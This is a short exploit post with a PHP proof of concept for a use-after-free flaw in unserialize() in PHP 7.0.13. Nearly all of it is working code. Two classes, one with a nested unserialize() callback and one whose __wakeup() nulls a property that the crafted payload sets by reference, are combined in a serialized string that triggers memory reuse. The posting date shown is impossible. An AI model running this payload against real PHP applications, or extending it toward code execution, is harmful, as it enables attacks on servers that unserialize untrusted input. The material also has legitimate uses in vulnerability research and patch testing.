
PHP 7.0.13 Use After Free unserialize PoC

Posted on 30 November -0001

PoC:

<?php
// Class using the Serializable interface; its unserialize() callback
// calls unserialize() again on the embedded data.
class obj1 implements Serializable {
    var $data;
    function serialize() {
        return serialize($this->data);
    }
    function unserialize($data) {
        $this->data = unserialize($data);
    }
}

// __wakeup() runs during unserialize() and overwrites the property
// that the payload sets through a reference (R:3).
class obj2 {
    var $ryat;
    function __wakeup() {
        $this->ryat = null;
    }
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:4:"obj1":'.strlen($inner).':{'.$inner.'}i:1;O:4:"obj2":1:{s:4:"ryat";R:3;}}';

$data = unserialize($exploit);

// Allocate a few strings after unserialize() returns, then dump the result.
for ($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi'.$i;
}

var_dump($data);
?>

 
